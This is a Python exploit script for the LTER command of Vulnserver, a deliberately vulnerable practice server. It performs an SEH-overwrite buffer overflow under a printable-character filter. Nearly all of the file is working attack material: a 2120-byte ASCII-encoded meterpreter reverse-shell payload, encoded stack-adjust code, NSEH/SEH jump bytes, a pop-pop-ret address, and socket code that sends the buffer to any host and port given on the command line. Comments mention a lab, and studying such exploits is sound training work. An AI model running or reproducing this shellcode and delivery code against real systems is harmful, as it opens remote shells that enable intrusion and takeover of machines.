#LTER Vulnserver Exploit
#Written by Elias Augusto
#SEH+Character Restrictions
from socket import *
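#Target (Vulnserver listening on 9999).  Override from the command line:
#   python lter.py [host] [port]
TARGET_HOST = '192.168.101.146' #Our target
TARGET_PORT = 9999
#Fail instead of hanging forever when the target is down or the service
#stops answering mid-send (the original socket had no timeout at all).
TIMEOUT_SECONDS = 10.0

#Payload layout (all sizes in bytes, offsets measured after the
#"LTER /.../" prefix):
#   0     SCBUF          2120  ASCII-encoded meterpreter reverse shell
#   2120  filler         1276  "C"s
#   3396  STACK_ADJUST     83  push esp / pop esi / encoded add si / jmp esi
#   3479  filler           35  "C"s
#   3514  NSEH              4  jno +6 / jo +4 -> both land on JMP_BACK
#   3518  SEH               4  pop pop ret (0x6250195E)
#   3522  JMP_BACK          2  jno -128 (after the filter) -> STACK_ADJUST
#   3524  filler         1474  dead space
#   4998  end
#The original header said "5000"; the arithmetic above gives 4998.  The
#2 missing bytes are in the trailing dead space, so nothing above moves,
#and 3524 - 128 == 3396 is exactly the start of STACK_ADJUST.

#Printable ASCII encoded meterpreter reverse shell - 2120 bytes, generated
#by opt_encoder.py from a 324 byte msfvenom payload.
#Note - IP of reverse shell is currently a random IP; regenerate this blob
#with your own listener address before using it in the lab.
#Move stack from 0xXXXXFFD0 to 0xXXXXFDC4 and run reverse shell - problems are usually solved by moving buffer up.
#Every byte here is <= 0x7f; LTER mangles anything above that, so the
#decoder is built only from sub/and/push/pop.
SCBUF = (
    b"\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x54\x58\x2d\x67\x28\x79"
    b"\x77\x2d\x64\x79\x65\x29\x2d\x41\x60\x21\x5f\x50\x5C\x25\x50\x50"
    b"\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x2b\x6f\x6f\x6f\x50\x25\x50\x50"
    b"\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x43\x5d\x50\x57\x2d\x30\x61\x28"
    b"\x2a\x2d\x23\x41\x34\x7f\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
    b"\x2a\x2d\x7f\x6f\x7f\x2a\x2d\x39\x70\x7e\x26\x2d\x58\x6a\x5f\x58"
    b"\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x21\x7a\x71\x6e"
    b"\x2d\x29\x7a\x6f\x62\x2d\x41\x4a\x5b\x73\x50\x25\x50\x50\x50\x50"
    b"\x25\x2a\x2a\x2a\x2a\x2d\x6c\x5f\x23\x7e\x2d\x2c\x6f\x45\x7e\x2d"
    b"\x67\x6e\x6d\x3d\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d"
    b"\x74\x63\x64\x60\x2d\x7f\x6a\x77\x25\x2d\x72\x32\x24\x7a\x50\x25"
    b"\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x2d\x66\x4f\x74\x2d\x6f"
    b"\x22\x60\x22\x2d\x65\x77\x50\x7f\x50\x25\x50\x50\x50\x50\x25\x2a"
    b"\x2a\x2a\x2a\x2d\x7a\x78\x3d\x68\x2d\x62\x78\x3d\x27\x50\x25\x50"
    b"\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x50\x28\x2a\x4f\x2d\x28\x4f"
    b"\x76\x6c\x2d\x2a\x2a\x60\x37\x50\x25\x50\x50\x50\x50\x25\x2a\x2a"
    b"\x2a\x2a\x2d\x2c\x23\x68\x71\x2d\x50\x4f\x68\x3b\x2d\x37\x2c\x30"
    b"\x7d\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x60\x60\x22"
    b"\x4f\x2d\x49\x37\x68\x42\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
    b"\x2a\x2d\x41\x42\x67\x7f\x2d\x33\x42\x39\x2b\x2d\x7d\x4b\x60\x7f"
    b"\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x79\x6f\x7f\x7f"
    b"\x2d\x37\x28\x75\x51\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
    b"\x2d\x6f\x6a\x28\x27\x2d\x6f\x5f\x2a\x7f\x2d\x22\x36\x43\x59\x50"
    b"\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x31\x24\x58\x4f\x2d"
    b"\x35\x52\x6c\x45\x2d\x42\x21\x3b\x2b\x50\x25\x50\x50\x50\x50\x25"
    b"\x2a\x2a\x2a\x2a\x2d\x39\x38\x21\x22\x2d\x68\x4d\x2a\x50\x2d\x67"
    b"\x79\x37\x65\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x4f"
    b"\x7f\x72\x22\x2d\x21\x21\x4f\x21\x2d\x31\x60\x68\x38\x50\x25\x50"
    b"\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x41\x7c\x75\x7c\x2d\x30\x38"
    b"\x79\x3e\x2d\x27\x49\x38\x7c\x50\x25\x50\x50\x50\x50\x25\x2a\x2a"
    b"\x2a\x2a\x2d\x68\x50\x60\x21\x2d\x60\x21\x24\x27\x2d\x38\x38\x28"
    b"\x60\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x73\x7d\x60"
    b"\x21\x2d\x50\x6f\x24\x42\x2d\x68\x7f\x27\x32\x50\x25\x50\x50\x50"
    b"\x50\x25\x2a\x2a\x2a\x2a\x2d\x7e\x43\x7d\x5e\x2d\x60\x41\x22\x42"
    b"\x2d\x7e\x27\x7b\x5f\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
    b"\x2d\x30\x54\x2a\x21\x2d\x28\x68\x27\x4f\x2d\x3e\x43\x46\x37\x50"
    b"\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x7d\x44\x5a\x4f\x2d"
    b"\x3d\x6b\x28\x2a\x2d\x36\x50\x7d\x30\x50\x25\x50\x50\x50\x50\x25"
    b"\x2a\x2a\x2a\x2a\x2d\x41\x62\x28\x60\x2d\x30\x30\x48\x4a\x2d\x25"
    b"\x2d\x27\x55\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x61"
    b"\x76\x22\x62\x2d\x21\x53\x52\x67\x50\x25\x50\x50\x50\x50\x25\x2a"
    b"\x2a\x2a\x2a\x2d\x4c\x7d\x56\x27\x2d\x60\x7f\x39\x6f\x2d\x7f\x7f"
    b"\x77\x68\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x7e\x50"
    b"\x25\x7f\x2d\x34\x68\x22\x23\x2d\x75\x7e\x58\x5e\x50\x25\x50\x50"
    b"\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x6f\x4f\x22\x7f\x2d\x3b\x59\x75"
    b"\x7e\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x21\x7a\x41"
    b"\x24\x2d\x50\x4f\x22\x66\x2d\x25\x36\x32\x71\x50\x25\x50\x50\x50"
    b"\x50\x25\x2a\x2a\x2a\x2a\x2d\x36\x68\x70\x5b\x2d\x28\x38\x2a\x2c"
    b"\x2d\x3b\x5f\x65\x78\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
    b"\x2d\x51\x22\x53\x78\x2d\x44\x41\x60\x5b\x2d\x63\x27\x60\x43\x50"
    b"\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x21\x2c\x72\x3e\x2d"
    b"\x41\x4c\x30\x4f\x2d\x2a\x7d\x5e\x23\x50\x25\x50\x50\x50\x50\x25"
    b"\x2a\x2a\x2a\x2a\x2d\x71\x6f\x7f\x41\x2d\x30\x51\x7f\x7e\x2d\x60"
    b"\x69\x7b\x7f\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x23"
    b"\x30\x47\x4f\x2d\x44\x2a\x44\x4f\x50\x25\x50\x50\x50\x50\x25\x2a"
    b"\x2a\x2a\x2a\x2d\x79\x74\x71\x6f\x2d\x77\x35\x37\x28\x50\x25\x50"
    b"\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x58\x38\x7c\x38\x2d\x39\x79"
    b"\x7e\x29\x2d\x70\x78\x6d\x33\x50\x25\x50\x50\x50\x50\x25\x2a\x2a"
    b"\x2a\x2a\x2d\x65\x3e\x31\x70\x2d\x7f\x3e\x7f\x4f\x2d\x32\x73\x70"
    b"\x5f\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x6f\x6f\x7f"
    b"\x5f\x2d\x41\x50\x30\x38\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
    b"\x2a\x2d\x6f\x7f\x7f\x6f\x2d\x41\x30\x30\x50\x50\x25\x50\x50\x50"
    b"\x50\x25\x2a\x2a\x2a\x2a\x2d\x6f\x7f\x7f\x60\x2d\x61\x77\x2d\x27"
    b"\x2d\x75\x7f\x6c\x27\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
    b"\x2d\x23\x5f\x76\x76\x2d\x44\x4d\x2a\x2a\x2d\x31\x51\x5f\x5e\x50"
    b"\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x6d\x7f\x24\x3c\x2d"
    b"\x56\x59\x4f\x28\x2d\x7d\x7e\x27\x74\x50\x25\x50\x50\x50\x50\x25"
    b"\x2a\x2a\x2a\x2a\x2d\x60\x22\x26\x21\x2d\x50\x42\x55\x23\x2d\x7b"
    b"\x30\x7a\x53\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x22"
    b"\x46\x74\x70\x2d\x23\x27\x5a\x30\x2d\x3b\x27\x31\x60\x50\x25\x50"
    b"\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x35\x30\x6f\x7f\x2d\x77\x7f"
    b"\x28\x57\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x71\x7b"
    b"\x27\x74\x2d\x30\x24\x3c\x5f\x2d\x5f\x60\x73\x68\x50\x25\x50\x50"
    b"\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x7f\x7f\x7f\x7f\x2d\x7f\x62\x7f"
    b"\x22\x2d\x32\x65\x70\x5c\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
    b"\x2a\x2d\x43\x2d\x43\x61\x2d\x60\x26\x5b\x21\x2d\x56\x23\x79\x7d"
    b"\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x48\x5f\x28\x66"
    b"\x2d\x50\x54\x60\x73\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
    b"\x2d\x41\x78\x50\x31\x2d\x4c\x55\x50\x7a\x50\x25\x50\x50\x50\x50"
    b"\x25\x2a\x2a\x2a\x2a\x2d\x70\x24\x24\x27\x2d\x34\x5c\x2a\x24\x2d"
    b"\x5c\x7f\x49\x3d\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d"
    b"\x2a\x6f\x6f\x6f\x2d\x79\x28\x5d\x5e\x50\x25\x50\x50\x50\x50\x25"
    b"\x2a\x2a\x2a\x2a\x2d\x30\x4f\x78\x78\x2d\x24\x21\x48\x7f\x2d\x21"
    b"\x7d\x54\x7a\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x70"
    b"\x27\x27\x60\x2d\x50\x3d\x41\x24\x2d\x60\x3b\x38\x21\x50\x25\x50"
    b"\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x27\x58\x45\x50\x2d\x50\x28"
    b"\x42\x50\x2d\x30\x25\x27\x60\x50\x25\x50\x50\x50\x50\x25\x2a\x2a"
    b"\x2a\x2a\x2d\x7f\x6f\x6f\x41\x2d\x5d\x35\x35\x5d\x50\x25\x50\x50"
    b"\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x7e\x7f\x3e\x60\x2d\x38\x79\x2d"
    b"\x2b\x2d\x7a\x7d\x4f\x50\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
    b"\x2a\x2d\x30\x7c\x22\x7f\x2d\x45\x7f\x52\x7f\x50\x25\x50\x50\x50"
    b"\x50\x25\x2a\x2a\x2a\x2a\x2d\x30\x21\x60\x4f\x2d\x50\x48\x48\x61"
    b"\x2d\x28\x7a\x56\x7c\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
    b"\x2d\x43\x79\x62\x4f\x2d\x32\x7a\x52\x25\x50\x25\x50\x50\x50\x50"
    b"\x25\x2a\x2a\x2a\x2a\x2d\x6f\x7f\x77\x27\x2d\x30\x43\x37\x2a\x2d"
    b"\x3d\x3c\x7e\x47\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d"
    b"\x45\x2a\x2d\x60\x2d\x60\x4f\x23\x21\x2d\x77\x2d\x24\x26\x50\x25"
    b"\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x7f\x4f\x7f\x22\x2d\x46"
    b"\x33\x5c\x68\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x70"
    b"\x26\x23\x67\x2d\x28\x57\x24\x38\x2d\x72\x7e\x3b\x68\x50\x25\x50"
    b"\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x5a\x21\x5a\x22\x2d\x60\x41"
    b"\x57\x44\x2d\x7f\x64\x6e\x23\x50\x25\x50\x50\x50\x50\x25\x2a\x2a"
    b"\x2a\x2a\x2d\x78\x38\x6a\x60\x2d\x68\x79\x2c\x26\x2d\x5f\x7e\x5b"
    b"\x78\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x3d\x28\x4d"
    b"\x7d\x2d\x70\x45\x3b\x73\x2d\x7d\x60\x78\x62\x50\x25\x50\x50\x50"
    b"\x50\x25\x2a\x2a\x2a\x2a\x2d\x4f\x5f\x2a\x7f\x2d\x26\x6c\x4a\x7f"
    b"\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x44\x7e\x4f\x4c"
    b"\x2d\x2a\x3e\x21\x26\x2d\x7a\x60\x54\x44\x50\x25\x50\x50\x50\x50"
    b"\x25\x2a\x2a\x2a\x2a\x2d\x38\x67\x21\x3d\x2d\x48\x7f\x22\x3d\x2d"
    b"\x7f\x46\x30\x3c\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d"
    b"\x3b\x2a\x6f\x6f\x2d\x74\x4a\x37\x70\x50\x25\x50\x50\x50\x50\x25"
    b"\x2a\x2a\x2a\x2a\x2d\x5d\x33\x57\x7f\x2d\x7c\x5c\x28\x35\x2d\x44"
    b"\x27\x7f\x7a\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x4f"
    b"\x4f\x70\x22\x2d\x26\x64\x7e\x65\x50\x25\x50\x50\x50\x50\x25\x2a"
    b"\x2a\x2a\x2a\x2d\x7a\x3b\x77\x71\x2d\x76\x39\x3e\x52\x50\x25\x50"
    b"\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x5a\x4a\x37\x32\x2d\x54\x5e"
    b"\x3d\x7b\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x48\x43"
    b"\x70\x64\x2d\x38\x79\x48\x2a\x2d\x7f\x7c\x64\x7e\x50\x25\x50\x50"
    b"\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x25\x6b\x38\x26\x2d\x3d\x54\x78"
    b"\x6f\x2d\x7e\x7f\x7f\x5c\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
    b"\x2a\x2d\x6f\x30\x7f\x7f\x2d\x30\x53\x7e\x54\x50\x25\x50\x50\x50"
    b"\x50\x25\x2a\x2a\x2a\x2a\x2d\x23\x7e\x71\x22\x2d\x2d\x32\x72\x22"
    b"\x2d\x7f\x50\x6f\x7e\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a"
    b"\x2d\x7a\x24\x36\x7b\x2d\x77\x24\x7f\x5e\x50\x25\x50\x50\x50\x50"
    b"\x25\x2a\x2a\x2a\x2a\x2d\x75\x25\x21\x75\x2d\x77\x4f\x6c\x62\x50"
    b"\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x4f\x79\x30\x34\x2d"
    b"\x5f\x7a\x44\x79\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d"
    b"\x53\x5f\x72\x21\x2d\x22\x50\x5d\x53\x50\x25\x50\x50\x50\x50\x25"
    b"\x2a\x2a\x2a\x2a\x2d\x7e\x21\x60\x27\x2d\x60\x4a\x6f\x46\x2d\x3d"
    b"\x62\x70\x2d\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x60"
    b"\x60\x3c\x7f\x2d\x32\x2c\x26\x7f\x2d\x6e\x73\x3d\x78\x50\x25\x50"
    b"\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x25\x54\x22\x47\x2d\x60\x43"
    b"\x28\x67\x2d\x7f\x7f\x32\x51\x50"
)

#What spike put before our A's
PREFIX = b"LTER /.../"

#Code that performs: Push ESP, Pop ESI, Encoded add SI,3DEh and JMP ESI - 83 bytes
#JMP_BACK lands on the first byte of this (push esp).
STACK_ADJUST = (
    b"\x54\x5e" #Push ESP, Pop ESI
    #Move stack from 0xXXXXEE44 to 0xXXXXFFD8 and start writing Shellcode
    b"\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a\x2a\x54\x58\x2d\x78\x61\x6f"
    b"\x73\x2d\x7a\x22\x30\x3d\x2d\x7a\x6a\x60\x4f\x50\x5C\x25\x50\x50"
    b"\x50\x50\x25\x2a\x2a\x2a\x2a\x2d\x3c\x60\x7d\x21\x2d\x42\x50\x3b"
    b"\x22\x2d\x7f\x50\x60\x2b\x50\x25\x50\x50\x50\x50\x25\x2a\x2a\x2a"
    b"\x2a\x2d\x30\x2d\x68\x7f\x2d\x3e\x25\x5c\x26\x2d\x2c\x2c\x75\x7b"
    b"\x50"
)

#nSEH.  Instructions: JNO 06 JO 04. Actual flag position doesn't matter,
#since the jump will be taken either way - both land on JMP_BACK.
NSEH = b"\x71\x06\x70\x04"
#SEH handler: pop pop ret at 0x6250195E (little-endian).
#NOTE(review): re-verify this address against the target's loaded module
#before use; it is only valid while that module sits at the same base.
SEH = b"\x5E\x19\x50\x62"
#Jump ~128 bytes backwards, overflow flag isn't set at this point, filter
#translated to 7180 (JNO -128) - as observed by the author, not rechecked here.
JMP_BACK = b"\x71\xFF"


def build_payload():
    """Return the complete LTER request as bytes (see layout table above).

    Pure function: builds the same 4998-byte body after PREFIX every call
    and touches no network, so it can be inspected or unit-tested offline.
    Bytes literals are used throughout so the 0xFF in JMP_BACK is sent as
    one byte on Python 3 (a str would be UTF-8 encoded into two bytes and
    shift the whole SEH layout).
    """
    return b"".join([
        PREFIX,
        SCBUF,           #2120 byte ASCII encoded msfvenom meterpreter reverse shell - generated by opt_encoder.py
        b"C" * 1276,     #C Buffer - Our unencoded shellcode is only 324 bytes so it's fine
        STACK_ADJUST,
        b"C" * 35,
        NSEH,
        SEH,
        JMP_BACK,
        b"C" * 1474,     #Dead space
    ])


def send_payload(host, port, payload, timeout=TIMEOUT_SECONDS):
    """Open a TCP connection to host:port, send payload in full, close.

    Uses sendall() rather than send(): send() may return after a partial
    write, and a truncated buffer would never reach the SEH overwrite.
    The socket is closed in a finally block so a refused connection or a
    timeout does not leak it.  Raises the underlying socket error.
    """
    s = socket(AF_INET, SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        s.sendall(payload)
    finally:
        s.close()


def main(argv=None):
    """Entry point: python lter.py [host] [port]; defaults to TARGET_*."""
    import sys
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if args else TARGET_HOST
    port = int(args[1]) if len(args) > 1 else TARGET_PORT
    send_payload(host, port, build_payload())


if __name__ == "__main__":
    main()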